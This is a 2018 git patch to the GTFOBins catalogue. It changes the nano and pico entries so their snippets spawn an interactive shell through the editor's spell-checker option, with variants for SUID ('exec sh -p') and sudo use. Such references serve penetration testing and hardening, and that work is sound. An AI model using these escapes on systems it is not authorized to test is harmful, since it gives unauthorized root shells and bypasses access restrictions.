From 7c0fa85a667688b8069835ea3d99b712f2429bd6 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 6 Sep 2018 21:36:02 +0200 Subject: [PATCH] Make nano/pico execute-interactive by using exec --- _gtfobins/nano.md | 20 +++++++------------- _gtfobins/pico.md | 20 +++++++------------- 2 files changed, 14 insertions(+), 26 deletions(-) diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md index 8004167..928ecc3 100644 --- a/_gtfobins/nano.md +++ b/_gtfobins/nano.md @@ -1,11 +1,9 @@ --- functions: - execute-non-interactive: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id + execute-interactive: + - code: | TF=$(mktemp) - echo "$COMMAND" > $TF + echo 'exec sh' > $TF chmod +x $TF nano -s $TF /etc/hosts ^T @@ -17,20 +15,16 @@ functions: file-read: - code: nano file_to_read suid-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id + - code: | TF=$(mktemp) - echo $'#!/bin/sh -p\n'"$COMMAND" > $TF + echo 'exec sh -p' > $TF chmod +x $TF ./nano -s $TF /etc/hosts ^T sudo-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id + - code: | TF=$(mktemp) - echo "$COMMAND" > $TF + echo 'exec sh' > $TF chmod +x $TF sudo nano -s $TF /etc/hosts ^T diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md index e350ebf..e6dc547 100644 --- a/_gtfobins/pico.md +++ b/_gtfobins/pico.md @@ -1,11 +1,9 @@ --- functions: - execute-non-interactive: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id + execute-interactive: + - code: | TF=$(mktemp) - echo "$COMMAND" > $TF + echo 'exec sh' > $TF chmod +x $TF pico -s $TF /etc/hosts ^T @@ -17,20 +15,16 @@ functions: file-read: - code: pico file_to_read suid-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id + - code: | TF=$(mktemp) - echo $'#!/bin/sh -p\n'"$COMMAND" > $TF + echo 'exec sh -p' > $TF chmod +x $TF ./pico -s $TF /etc/hosts ^T sudo-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id + - code: | TF=$(mktemp) - echo "$COMMAND" > $TF + echo 'exec sh' > $TF chmod +x $TF sudo pico -s $TF /etc/hosts ^T